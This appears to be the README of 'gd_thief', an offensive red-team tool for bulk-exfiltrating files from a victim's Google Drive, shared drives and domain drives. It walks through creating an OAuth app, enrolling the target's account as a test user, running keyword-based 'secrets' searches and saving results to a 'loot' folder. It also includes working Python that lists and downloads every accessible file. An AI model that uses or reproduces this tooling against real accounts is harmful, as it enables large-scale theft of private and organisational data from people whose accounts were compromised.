Red Team tool for exfiltrating files from a target's Google Drive that you (the attacker) have access to, via the Google Drive API. This includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.
For an illustrated walkthrough, check out my blog post.
Steps to create the OAuth client credentials (the client secret JSON) that gd_thief uses to obtain the Google API access token it needs for connecting to the API:

1. In the Google Cloud Console, click the Down arrow at the top of the page. A dialog listing current projects appears.
2. Click New Project. The New Project screen appears.
3. In the Project Name field, enter a descriptive name for your project.
4. To edit the Project ID, click Edit. The project ID can't be changed after the project is created, so choose an ID that meets your needs for the lifetime of the project.
5. Click Create. The console navigates to the Dashboard page and your project is created within a few minutes.
6. Click the Down arrow and select the project you just created from the dropdown list.
7. Click Menu > APIs & Services.
8. Click Enable APIs and Services. The "Welcome to API Library" page appears.
9. In the search field, enter "Google Drive".
10. Click Enable. The Overview page appears.
11. Click Credentials. The credential page for your project appears.
12. Click Configure Consent Screen. The "OAuth consent screen" screen appears.
13. Select the External user type for your app.
14. Click Create. A second "OAuth consent screen" screen appears.
15. Fill in the App name field, the User support email field and the Developer contact information field.
16. Click Save and Continue. The "Scopes" page appears.
17. Click Add or Remove Scopes. The "Update selected scopes" page appears.
18. Select the Google Drive scopes to use in the app. GD scopes cover 2 pages, so click the next page and ensure that you check them all.
19. Click Update. A list of scopes for your app appears.
20. Click Save and Continue. The "Edit app registration" page appears.
21. Click Save and Continue. The "OAuth consent screen" appears.
22. Click Create Credentials and select OAuth client ID. The "Create OAuth client ID" page appears.
23. Select Desktop Application.
24. In the name field, type a name for the credential. This name is only shown in the Cloud Console.
25. Click Create. The OAuth client created screen appears. This screen shows the Client ID and Client secret.
26. Click OK. The newly created credential appears under "OAuth 2.0 Client IDs."
27. Click the download button to the right of the newly-created OAuth 2.0 Client ID. This copies a client secret JSON file to your desktop. Note the location of this file.
28. Place that JSON file in the gd_thief/credentials directory.

In order to be able to run this script against the victim, you will need to add their Google account to the Test Users list for the App you just created:

1. Click OAuth consent screen. The "OAuth Consent Screen" page appears.
2. Under Test Users, click the Add Users button.
3. Enter the target's Google account in the email address field.
4. Click the save button.

Because the app stays in the "Testing" publishing status, Google only lets the listed test users authorize it and expires their refresh tokens after seven days, so re-run the authorization if the cached token stops refreshing.

Upon gaining access to a Target's Google account, you can run gd_thief.
Requirements (Google API libraries):

```
pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib
```
```
usage:
python3 gd_thief.py [-h] -m {dlAll,dlDict} [-d <DICTIONARY FILE PATH>] [-t <THREAD COUNT>]

help:
This Module will connect to Google's API using an access token and exfiltrate files
from a target's Google Drive. It will output exfiltrated files to the ./loot directory

arguments:
  -m {dlAll,dlDict}, --mode {dlAll,dlDict}
        The mode of file download.
        Can be "dlAll", "dlDict [-d <DICTIONARY FILE PATH>]", or... (More options to come)

optional arguments:
  -d <DICTIONARY FILE PATH>, --dict <DICTIONARY FILE PATH>
        Path to the dictionary file. Mandatory with download mode "-m, --mode dlDict".
        You can use the provided dictionary, for example: "-d ./dictionaries/secrets-keywords.txt"
  -t <THREAD COUNT>, --threads <THREAD COUNT>
        Number of threads. (Too many could exceed Google's rate limit threshold)
  -h, --help
        show this help message and exit
```
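The console walkthrough above and the dlAll/dlDict modes in the usage text come down to three Drive API operations: the desktop OAuth flow against the downloaded client secret, a paginated files().list that also covers shared-with-me items and shared drives, and a per-file download that exports Google-native documents instead of fetching them as media. The block below is an added example written for this page, not gd_thief's own code, using the libraries from the pip line above. It assumes the client secret is saved as credentials/client_secret.json and the cached user token as credentials/token.json (both hypothetical names), requests only the drive.readonly scope (sufficient to list and download; the all-scopes selection in step 18 mainly enlarges the consent prompt), and keeps the network calls inside get_service() and download_file() so the query builder, pager and download planner can be exercised offline.

```python
# Added example, not gd_thief's code. Paths below are hypothetical.
import io
import os
import time

SCOPES = ["https://www.googleapis.com/auth/drive.readonly"]  # enough to list and download
FIELDS = "nextPageToken, files(id, name, mimeType, driveId, size)"

# Google-native documents cannot be fetched with files().get_media; they must be
# exported. Native MIME -> (export MIME, extension). Anything else is plain binary.
EXPORT_MIME = {
    "application/vnd.google-apps.document": ("application/pdf", ".pdf"),
    "application/vnd.google-apps.spreadsheet": ("text/csv", ".csv"),
    "application/vnd.google-apps.presentation": ("application/pdf", ".pdf"),
}


def escape_q(value):
    """Escape a literal for a Drive 'q' string: backslashes first, then single quotes."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_query(keywords=None):
    """dlAll -> everything not trashed; dlDict -> only names containing a keyword."""
    q = "trashed = false"
    terms = [k.strip() for k in (keywords or []) if k.strip()]
    if terms:
        q += " and (" + " or ".join(f"name contains '{escape_q(t)}'" for t in terms) + ")"
    return q


def load_dictionary(path):
    """One keyword per line, like ./dictionaries/secrets-keywords.txt; '#' lines ignored."""
    with open(path, encoding="utf-8") as fh:
        return [ln.strip() for ln in fh if ln.strip() and not ln.startswith("#")]


def is_rate_limited(exc):
    """googleapiclient.errors.HttpError exposes the HTTP status as exc.resp.status.
    Duck-typed so this module imports without the library. Drive reports per-user
    rate limiting as 403 (userRateLimitExceeded) as well as 429, so both are retried;
    a genuine 403 permission error still surfaces once the retries are exhausted."""
    return getattr(getattr(exc, "resp", None), "status", None) in (403, 429)


def list_files(service, query, max_retries=5):
    """Page through files().list over My Drive, shared-with-me items and all shared drives."""
    files, token = [], None
    while True:
        req = service.files().list(
            q=query, fields=FIELDS, pageSize=1000, pageToken=token,
            corpora="allDrives", includeItemsFromAllDrives=True, supportsAllDrives=True,
        )
        for attempt in range(max_retries):
            try:
                page = req.execute()
                break
            except Exception as exc:
                if not is_rate_limited(exc) or attempt == max_retries - 1:
                    raise
                time.sleep(2 ** attempt)  # exponential backoff instead of hammering the quota
        files.extend(page.get("files", []))
        token = page.get("nextPageToken")
        if not token:
            return files


def plan_download(meta):
    """How a listed file is fetched: ('export', mime, name), ('media', None, name) or ('skip', ...)."""
    export = EXPORT_MIME.get(meta["mimeType"])
    if export:
        return "export", export[0], meta["name"] + export[1]
    if meta["mimeType"].startswith("application/vnd.google-apps."):
        return "skip", None, meta["name"]  # folders, shortcuts, forms: nothing to download
    return "media", None, meta["name"]


def get_service(secret="credentials/client_secret.json", token="credentials/token.json"):
    """Desktop OAuth flow for the client created in the walkthrough; caches the user token."""
    from google.auth.transport.requests import Request
    from google.oauth2.credentials import Credentials
    from google_auth_oauthlib.flow import InstalledAppFlow
    from googleapiclient.discovery import build

    creds = Credentials.from_authorized_user_file(token, SCOPES) if os.path.exists(token) else None
    if creds and creds.expired and creds.refresh_token:
        creds.refresh(Request())  # fails with invalid_grant once the 7-day Testing-status limit hits
    elif not creds or not creds.valid:
        creds = InstalledAppFlow.from_client_secrets_file(secret, SCOPES).run_local_server(port=0)
        with open(token, "w", encoding="utf-8") as fh:
            fh.write(creds.to_json())
    return build("drive", "v3", credentials=creds)


def download_file(service, meta, loot_dir="loot"):
    """Write one file into loot_dir; returns the local path or None if skipped."""
    from googleapiclient.http import MediaIoBaseDownload

    kind, mime, name = plan_download(meta)
    if kind == "skip":
        return None
    if kind == "export":
        req = service.files().export_media(fileId=meta["id"], mimeType=mime)
    else:
        req = service.files().get_media(fileId=meta["id"], supportsAllDrives=True)
    os.makedirs(loot_dir, exist_ok=True)
    # Drive names may contain "/" or "..": basename keeps the write inside loot_dir.
    out = os.path.join(loot_dir, os.path.basename(name) or meta["id"])
    with io.FileIO(out, "wb") as fh:
        downloader, done = MediaIoBaseDownload(fh, req), False
        while not done:
            _, done = downloader.next_chunk()
    return out
```

Call get_service() once interactively (it opens the consent screen for the test user), then list_files(service, build_query(load_dictionary("./dictionaries/secrets-keywords.txt"))) for dlDict or build_query() for dlAll, and download_file for each hit. If you parallelise the downloads as gd_thief does with -t, keep the backoff in list_files: the rate-limit warning in the help text is what it guards against.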
Thank you to my good friend Cedric Owens for helping me with the threading piece!